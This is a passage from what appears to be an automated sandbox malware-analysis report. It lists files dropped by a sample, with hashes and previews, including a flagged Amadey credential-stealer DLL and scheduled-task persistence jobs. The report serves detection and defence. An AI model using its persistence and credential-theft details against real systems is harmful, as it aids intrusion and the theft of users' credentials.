                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1285632
                                                                                                                                                                                                                                      Entropy (8bit):6.460276790319054
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:2vkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggv4+yC7:2sMPSYcS5wPi095PbgS4
                                                                                                                                                                                                                                      MD5:F35B671FDA2603EC30ACE10946F11A90
                                                                                                                                                                                                                                      SHA1:059AD6B06559D4DB581B1879E709F32F80850872
                                                                                                                                                                                                                                      SHA-256:83E3DF5BEC15D5333935BEA8B719A6D677E2FB3DC1CF9E18E7B82FD0438285C7
                                                                                                                                                                                                                                      SHA-512:B5FA27D08C64727CEF7FDDA5E68054A4359CD697DF50D70D1D90DA583195959A139066A6214531BBC5F20CD4F9BC1CA3E4244396547381291A6A1D2DF9CF8705
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                      C:\Windows\Tasks\chrosha.job

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000054001\amert.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):292
                                                                                                                                                                                                                                      Entropy (8bit):3.4254082849999485
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:r8idbX45ZsUEZ+lX1ErCqdtFXqYEp5t/uy0lt/Zut0:QsrDQ1EeqNfXVnut0
                                                                                                                                                                                                                                      MD5:5BA67D0063A9510A62E74AFF2AA7A099
                                                                                                                                                                                                                                      SHA1:BA33B22D04BEB641DFD941FECFEB849E1D512942
                                                                                                                                                                                                                                      SHA-256:8092517863692DE50DB71C91DBD5E81DD819DE93D5A77E53DDC4B429A6D61374
                                                                                                                                                                                                                                      SHA-512:4199F468E2E83259C01129991A9267A967C2B4F1884A66CA58370D31ED03A4BCA3D40BC3CE9A9654629FA9EE30DE48FD17BD7EBCF3EF8C6920767C1F0A48BDD7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.........U.I..".Y...F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.d.0.a.b.1.5.8.0.4.\.c.h.r.o.s.h.a...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

                                                                                                                                                                                                                                      C:\Windows\Tasks\explorha.job

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):294
                                                                                                                                                                                                                                      Entropy (8bit):3.419081551925166
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:W9/8n7XUG5ZsUEZ+lX1y6y2l+lRdtFXqYEp5t/uy0lt/2t0:W90nLYQ1y6NkDNfXV4t0
                                                                                                                                                                                                                                      MD5:1AB5CF4A8E904504900A3E0A3EF303A7
                                                                                                                                                                                                                                      SHA1:B5067400C2F095860770D380D2BC1789C1BB373F
                                                                                                                                                                                                                                      SHA-256:295E67CDBFC733855EF133B57F68A98BE51BEDFDD21EEA1827E2EC5926E01F65
                                                                                                                                                                                                                                      SHA-512:DC0277BBA90F052780239E79CBEA593F95E8F4457A0861569ABFEEBF1D63DCFB734C4B7E190E1CBEDAC08F6AF896D1F2D63B5948FA98979E64C82DE58AC4D22C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:....|<..4}.E.cZ.?:..F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.9.f.d.8.5.1.a.4.f.\.e.x.p.l.o.r.h.a...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                      Entropy (8bit):4.424738903564287
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:iSvfpi6ceLP/9skLmb0OTIWSPHaJG8nAgeMZMMhA2fX4WABlEnNO0uhiTw:xvloTIW+EZMM6DFyY03w
                                                                                                                                                                                                                                      MD5:CC020EE506DEE63112FF1BC6309634AD
                                                                                                                                                                                                                                      SHA1:54909AA212DB1137B96EB870263BB4FF7C4143DB
                                                                                                                                                                                                                                      SHA-256:73C4A3662FF2414A923A586C6520D0659908C39D3919C3F0B4C5EF726EC70A11
                                                                                                                                                                                                                                      SHA-512:A2D6DB232B19F575976FDE5B8041CB0D3288AC36CA12CE6F2678B3F9FDB17FD64C7505CF1AEA2014A284B7B9BE250E4C5E1C59D08630651A0EC17433D6F204EE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:8..................................................................................................................................................................................................................................................................................................................................................ec.>........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      Chrome Cache Entry: 195

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1631)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38525
                                                                                                                                                                                                                                      Entropy (8bit):5.3838229197405845
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ka4ZsJiVqZZIpNGVMfgXafCcgBRyLa7l6txRjXbwm75/JgZRrQAT6l:bZCfVfCCa7qxR3nt/JgT6
                                                                                                                                                                                                                                      MD5:F269DC67D0E2355F1A50E500D5BE54A8
                                                                                                                                                                                                                                      SHA1:96A3A5C465D8A6B18373BF73138DBEB2B03AE534
                                                                                                                                                                                                                                      SHA-256:7FAB6151E7F2088D3E76373C563CCC3F9AE1523C49E8D38225F82158F8557954
                                                                                                                                                                                                                                      SHA-512:4B81B50467C5CD3CB11DCA60F6A9438214557565BEE34558B128BE17628965A6184D5845E4B61B883D8C4F140BE97259A16AF5361280EE1ADE4F0E674A4B2101
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.mpa=function(a){var b=0,c;for(c in a)b++;return b};_.npa=function(a){return a.hh&&"function"==typeof a.hh?a.hh():_.ja(a)||"string"===typeof a?a.length:_.mpa(a)};_.qn=function(a){if(a.Xg&&"function"==typeof a.Xg)return a.Xg();if("undefined"!==typeof Map&&a instanceof Map||"undefined"!==typeof Set&&a instanceof Set)return Array.from(a.values());if("string"===typeof a)return a.split("");if(_.ja(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.ob(a)};._.opa=function(a){if(a.Vg&&"function"==typeof a.Vg)return a.Vg();if(!a.Xg||"function"!=typeof a.Xg){if("undefined"!==typeof Map&&a instanceof Map)return Array.from(a.keys());if(!("undefined"!==typeof Set&&a instanceof Set)){if(_.ja(a)||"string"===typeof a){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.pb(a)}}};.var ppa,spa,rpa,qpa,Gn,In,Epa,vpa,xpa,wpa,Apa,ypa;ppa=function(a,b,c){if(b)re

                                                                                                                                                                                                                                      Chrome Cache Entry: 196

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (574)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):3449
                                                                                                                                                                                                                                      Entropy (8bit):5.476559526829746
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:oWqZ4RE7YGueGE3bYetPjR6lv7esvpagGahjOw:wZ4R8XkvAgGq
                                                                                                                                                                                                                                      MD5:F6053E7D421B4DBDA6B13AFE6A4E8331
                                                                                                                                                                                                                                      SHA1:A4040265AD3E09BEEB0B6C8EC35156831A56F9AA
                                                                                                                                                                                                                                      SHA-256:666B45739C898F59D524D3C78B5FBF452E731DFE64CE2BBB5E7C1D45181EDE93
                                                                                                                                                                                                                                      SHA-512:CA5836BD044567762D922B20ECAA977ECBDFDE5BFE14CD692B489C93A6B25155ED1346FE60ABB93DFF986E944754899C7420982F354083463C3150ED5557504F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("Wt6vjf");.var ota=function(){var a=_.ae();return _.yi(a,1)};var lq=function(a){this.Ga=_.t(a,0,lq.messageId)};_.A(lq,_.v);lq.prototype.Ja=function(){return _.Zh(this,1)};lq.prototype.Va=function(a){return _.Ki(this,1,a)};lq.messageId="f.bo";var mq=function(){_.Ak.call(this)};_.A(mq,_.Ak);mq.prototype.Xc=function(){this.PO=!1;pta(this);_.Ak.prototype.Xc.call(this)};mq.prototype.aa=function(){qta(this);if(this.Rz)return rta(this),!1;if(!this.NQ)return nq(this),!0;this.dispatchEvent("p");if(!this.oK)return nq(this),!0;this.kI?(this.dispatchEvent("r"),nq(this)):rta(this);return!1};.var sta=function(a){var b=new _.zn(a.X_);null!=a.qL&&b.aa("authuser",a.qL);return b},rta=function(a){a.Rz=!0;var b=sta(a),c="rt=r&f_uid="+_.Ng(a.oK);_.gl(b,(0,_.of)(a.fa,a),"POST",c)};.mq.prototype.fa=function(a){a=a.target;qta(this);if(_.jl(a)){this.iG=0;if(this.kI)this.Rz=!1,this.dispatchEvent("

                                                                                                                                                                                                                                      Chrome Cache Entry: 197

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4199)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):19278
                                                                                                                                                                                                                                      Entropy (8bit):5.369599228603606
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:cvdvKJdlmqS6Y09al9NSQqbZrM+McC4Gw+RXY2RAgpho55WW12:KvV6Y09a3wrHCQ+RIVgwWW12
                                                                                                                                                                                                                                      MD5:CF3995B2563E0EBF8D485583199AA881
                                                                                                                                                                                                                                      SHA1:AD8F16F214600B1C8D4B18E6BC227CBBE7921804
                                                                                                                                                                                                                                      SHA-256:D2D12D9D00DB79F5F874A8A5BF942591D4DB684901EDA33A7CDCA25E6F84377C
                                                                                                                                                                                                                                      SHA-512:B19CF516537D180DD64A6B9ECDD9760085971422511FF59FA05D120B43B4971611429B5A03D7D5384029D1691B6B414F9340701CA337D5CBA429C32CBE8D4310
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.Qu=function(a){this.Ga=_.t(a)};_.A(_.Qu,_.v);_.Ru=function(a,b){return _.wd(a,3,b,_.Cc)};_.Qu.Mb=[1,2,3,4];.var wCa=_.da.URL,xCa,yCa,ACa,zCa;try{new wCa("http://example.com"),xCa=!0}catch(a){xCa=!1}yCa=xCa;.ACa=function(a){var b=_.dh("A");try{_.Kb(b,new _.wb(a));var c=b.protocol}catch(e){throw Error("hc`"+a);}if(""===c||":"===c||":"!=c[c.length-1])throw Error("hc`"+a);if(!zCa.has(c))throw Error("hc`"+a);if(!b.hostname)throw Error("hc`"+a);var d=b.href;a={href:d,protocol:b.protocol,username:"",password:"",hostname:b.hostname,pathname:"/"+b.pathname,search:b.search,hash:b.hash,toString:function(){return d}};zCa.get(b.protocol)===b.port?(a.host=a.hostname,a.port="",a.origin=a.protocol+"//"+a.hostname):.(a.host=b.host,a.port=b.port,a.origin=a.protocol+"//"+a.hostname+":"+a.port);return a};._.BCa=function(a){if(yCa){try{var b=new wCa(a)}catch(d){throw Error("hc`"+a);}var c=zCa.g

                                                                                                                                                                                                                                      Chrome Cache Entry: 198

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (405)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1644
                                                                                                                                                                                                                                      Entropy (8bit):5.224999139019226
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:o7UHjAjx++s4zR8ClyH5agKGwhkUshvNrw:o9tB8CYHEWXw
                                                                                                                                                                                                                                      MD5:88F6374D6EB346B9165A2F00E6D4F9ED
                                                                                                                                                                                                                                      SHA1:00ACCB56561DF0D6E14A0D3C3E194C9500BB4AD6
                                                                                                                                                                                                                                      SHA-256:EDC311CA77447F49C7A96707ED2D979FA6455DED265D3985F03DD137FC0430D5
                                                                                                                                                                                                                                      SHA-512:A2895383498A7FAA1596862B55EE7CBA28FC2185FBE8760A1988B180CE15C35011DDA4233BE6F4A79DB60DEA9BEFC1C34C80A8DBB847CFDF5337C2F2A70A8E9E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("w9hDv");._.qf(_.dja);_.Nv=function(a){_.I.call(this,a.Ha);this.aa=a.Wa.cache};_.A(_.Nv,_.I);_.Nv.Na=_.I.Na;_.Nv.Ba=function(){return{Wa:{cache:_.$o}}};_.Nv.prototype.execute=function(a){_.nb(a,function(b){var c;_.ie(b)&&(c=b.Za.Wb(b.fb));c&&this.aa.lD(c)},this);return{}};_.Eq(_.yja,_.Nv);._.l();._.k("kMFpHd");._.oVa=new _.xe(_.Fk);._.l();._.k("VwDzFe");.var hE=function(a){_.I.call(this,a.Ha);this.aa=a.Fa.Sq;this.fa=a.Fa.metadata;this.da=a.Fa.Jq};_.A(hE,_.I);hE.Na=_.I.Na;hE.Ba=function(){return{Fa:{Sq:_.ID,metadata:_.oVa,Jq:_.FD}}};hE.prototype.execute=function(a){var b=this;a=this.da.create(a);return _.nb(a,function(c){var d=2===b.fa.getType(c.Ed())?b.aa.Xb(c):b.aa.aa(c);return _.Ij(c,_.JD)?d.then(function(e){return _.md(e)}):d},this)};_.Eq(_.Dja,hE);._.l();._.k("sP4Vbe");._.nVa=new _.xe(_.zja);._.l();._.k("A7fCU");.var ND=function(a){_.I.call(this,a.Ha);this.aa=a.Fa.tL}

                                                                                                                                                                                                                                      Chrome Cache Entry: 199

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):749
                                                                                                                                                                                                                                      Entropy (8bit):4.70368920713592
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:t4nolW84qhebl8cP5UbKEBnStLJdJad+DB3xELFkXUIx+RWuSrtUjAC9ZiCWInLE:t4olS+2x5UbKrTJ9DA0YWrrmWCFzfIvB
                                                                                                                                                                                                                                      MD5:AA920B32443219E3EDFA32DEF5EBD457
                                                                                                                                                                                                                                      SHA1:8A4B47D0A2CA261803AA5C1A9DDE7BA3FE15B298
                                                                                                                                                                                                                                      SHA-256:E5773339E56DD15D8DAAB94CE6ED5D444D1EF0B61355E20854234605BB2E755B
                                                                                                                                                                                                                                      SHA-512:C45BDB233447E1F4D3B4B5174A328E3D8987C9B5E2E12733E5027173B0302919680901C311094714CFC32AC2F2C749DC9EB95FFCAA8F5DA1E5EBEF3FB7225E37
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" height="36" viewBox="0 0 36 36" width="36"><path d="M34.32 18.39c0-1.17-.11-2.3-.29-3.39H18v6.48h9.4c-.38 2.19-1.59 4.05-3.42 5.31v4.1h5.28c3.2-2.97 5.06-7.33 5.06-12.5z" fill="#4285F4"/><path d="M18 35c4.59 0 8.44-1.52 11.25-4.12l-5.28-4.1c-1.57 1.08-3.59 1.71-5.97 1.71-4.51 0-8.33-3.02-9.73-7.11H2.82v4.23C5.62 31.18 11.36 35 18 35z" fill="#34A853"/><path d="M8.27 21.39c-.36-1.07-.57-2.21-.57-3.39s.21-2.32.58-3.39v-4.23H2.82C1.67 12.67 1 15.25 1 18s.67 5.33 1.82 7.63l5.45-4.24z" fill="#FBBC05"/><path d="M18 7.5c2.56 0 4.86.88 6.67 2.61l.01.02 4.7-4.7C26.43 2.68 22.59 1 18 1 11.36 1 5.62 4.82 2.82 10.37l5.45 4.23c1.4-4.08 5.22-7.1 9.73-7.1z" fill="#EA4335"/><path d="M1 1h34v34H1z" fill="none"/></svg>

                                                                                                                                                                                                                                      Chrome Cache Entry: 200

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5430
                                                                                                                                                                                                                                      Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                      MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                      SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                      SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                      SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

                                                                                                                                                                                                                                      Chrome Cache Entry: 201

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (682)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4126
                                                                                                                                                                                                                                      Entropy (8bit):5.355816676246375
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:GOFB1Kce2eMXmvci7UccRyDlyiKenjwf9Xn6Ow:93Kcri7U1RyDlyiKenjUN6b
                                                                                                                                                                                                                                      MD5:C18D7346DE40A0E15C7AD41BDC248E21
                                                                                                                                                                                                                                      SHA1:1AA3B333CABC332A486E1390FE223ECA98CE9BBE
                                                                                                                                                                                                                                      SHA-256:555F0968B40AA581D32E1802451B0B941875D0A7571CFCDDD3703BF83FE0DF24
                                                                                                                                                                                                                                      SHA-512:115945EF71ECF7A1FC00775596237E542F90E733D249C38313653E9FEC086666A7A25714EE432BD3AB50A88E917EEE10696C3E445C127B1AFA71860D8AFA1EA4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";_F_installCss(".N7rBcd{overflow-x:auto}sentinel{}");.this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.qf(_.Xna);._.k("sOXFj");.var Kq=function(a){_.I.call(this,a.Ha)};_.A(Kq,_.I);Kq.Na=_.I.Na;Kq.Ba=_.I.Ba;Kq.prototype.aa=function(a){return a()};_.Eq(_.Wna,Kq);._.l();._.k("oGtAuc");._.Jta=new _.xe(_.Xna);._.l();._.k("q0xTif");.var Fua=function(a){var b=function(d){_.Rl(d)&&(_.Rl(d).yc=null,_.Xq(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(var c=0;c<a.length;c++)b(a[c])},ir=function(a){_.gp.call(this,a.Ha);this.Qa=this.dom=null;if(this.xi()){var b=_.lk(this.Kf(),[_.Jk,_.Ik]);b=_.th([b[_.Jk],b[_.Ik]]).then(function(c){this.Qa=c[0];this.dom=c[1]},null,this);_.xq(this,b)}this.Ma=a.yh.W7};_.A(ir,_.gp);ir.Ba=function(){return{yh:{W7:function(){return _.ff(this)}}}};ir.prototype.getContext=function(a){return this.Ma.getContext(a)};.ir.prototype.getData=function(a){return this.Ma.getData(a)};ir.protot

                                                                                                                                                                                                                                      Chrome Cache Entry: 202

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (504)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2215
                                                                                                                                                                                                                                      Entropy (8bit):5.36757102910705
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:ob1bEIZs1Ii7Bq7ZKhGdfWK7Dt75vpTMW1zmieTHWxrw:o5r8Ph4fPtdv91zmieT8w
                                                                                                                                                                                                                                      MD5:306BAA59FBF8C921E798B0D5496B3915
                                                                                                                                                                                                                                      SHA1:CB3B568B8C1F7A8187BC4146D91B3471E2152DCA
                                                                                                                                                                                                                                      SHA-256:C816386F29E09DEDABBA8AC4F9A1BC06799796BE47AB9E88B1F34A3CA6CF333D
                                                                                                                                                                                                                                      SHA-512:131121A04F87D5F41B659C932DE2FE268DE9B49DA890044DCA224C46D6F385A097BE7E472C831E7A1E16FB3D54E22A2D5D1D7501831E079CCA12C3978AEE95A5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.YKa=_.y("iCBEqb",[_.Roa]);._.k("iCBEqb");.var VH=function(a){_.J.call(this,a.Ha);this.aa=a.Fa.xz};_.A(VH,_.J);VH.Ba=function(){return{Fa:{xz:_.UH}}};VH.prototype.EB=function(){var a=this.aa;_.w4a(a);_.v4a(a)};_.K(VH.prototype,"IYtByb",function(){return this.EB});_.M(_.YKa,VH);._.l();._.eMa=_.y("nKuFpb",[_.Kl,_.Bx]);._.k("nKuFpb");.var p_a=_.zf(["target"]),q_a=_.zf(["aria-"]),r_a=_.zf(["aria-"]),EF=function(a){_.xF.call(this,a.Ha);this.Kc=a.Fa.Kc;this.link=this.oa().find("A").kd(0);if(_.tC(this.oa())){a=this.oa().el();var b=this.Pe.bind(this);a.__soy_skip_handler=b}};_.A(EF,_.xF);EF.Ba=function(){return{Fa:{Kc:_.Iq}}};_.g=EF.prototype;_.g.ue=function(){};_.g.nE=function(a){_.Kb(this.link.el(),a)};_.g.Xr=function(a){_.qq([_.Db(p_a)],this.link.Nb(),"target",a)};._.g.click=function(a){if("keydown"===a.type&&"Enter"===_.CF(a.event))return!1;_.xF.prototype.click.call(this,a);retu

                                                                                                                                                                                                                                      Chrome Cache Entry: 203

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (834)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7669
                                                                                                                                                                                                                                      Entropy (8bit):5.358621282750075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:KoBsYETJv5wkjv7JkfKNuv0DCzeBinCWBKRYaRdR2bRuRPR5RGRfRhRAR8RA:1sBXwknJrN/s2t
                                                                                                                                                                                                                                      MD5:C342BFA66173FE4BCC024C34B5B7BCB7
                                                                                                                                                                                                                                      SHA1:32BB20CACA08FBE056A15218A778B5DCA219134C
                                                                                                                                                                                                                                      SHA-256:93127A8CDDC51F0FFA89579EBA1578F54CA2CF65701550E9F6A611362C79A1A9
                                                                                                                                                                                                                                      SHA-512:F878BEE61FE8CCC5B1B279E2AF265720D26558BF5C4EC819C8A897607B6726C2156C6D4D0F621F4434E9233BB6C10843C837FDC848A3586D52B849AFD7A71FE4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.qMa=_.y("wg1P6b",[_.tx,_.El,_.Kl]);._.k("wg1P6b");.var m1a=function(a,b){b=b||_.Ja;for(var c=0,d=a.length,e;c<d;){var f=c+(d-c>>>1);var h=b(0,a[f]);0<h?c=f+1:(d=f,e=!h)}return e?c:-c-1},n1a=function(a,b){for(;b=b.previousSibling;)if(b==a)return-1;return 1},o1a=function(a,b){var c=a.parentNode;if(c==b)return-1;for(;b.parentNode!=c;)b=b.parentNode;return n1a(b,a)},p1a=function(a,b){if(a==b)return 0;if(a.compareDocumentPosition)return a.compareDocumentPosition(b)&2?1:-1;if(_.xg&&!(9<=Number(_.Eg))){if(9==a.nodeType)return-1;if(9==b.nodeType)return 1}if("sourceIndex"in.a||a.parentNode&&"sourceIndex"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a.parentNode,f=b.parentNode;return e==f?n1a(a,b):!c&&_.hh(e,b)?-1*o1a(a,b):!d&&_.hh(f,a)?o1a(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d=_.Vg(a);c=d.create

                                                                                                                                                                                                                                      Chrome Cache Entry: 204

